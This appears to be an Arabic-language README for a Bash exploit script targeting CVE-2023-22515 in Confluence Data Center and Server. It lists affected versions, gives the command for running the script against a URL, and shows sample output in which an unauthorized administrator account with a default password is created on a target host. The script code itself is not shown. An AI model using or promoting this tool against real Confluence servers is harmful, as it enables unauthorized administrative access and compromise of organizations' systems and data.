
# سكربت Bash يستغل CVE-2023-22515 في Confluence Data Center و Server لإنشاء حسابات مسؤول غير مصرح بها، مما يتيح الوصول غير المصرح به.
سكربت بسيط بلغة Bash لاستغلال ثغرة CVE-2023-22515.
تحتوي خوادم Confluence Data Center وServer على ثغرة في التحكم بالوصول (CVE-2023-22515)، مما يسمح للمهاجمين بإنشاء حسابات مسؤول غير مصرح بها في Confluence والوصول إلى خوادم Confluence.
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] Checking if host is vulnerable...
Vulnerable --> Responde Code: 200
[+] Exploiting Target...
[+] Exploit Completed!!!
[INFO] User created: a123456
[INFO] Password created: ChangeMe123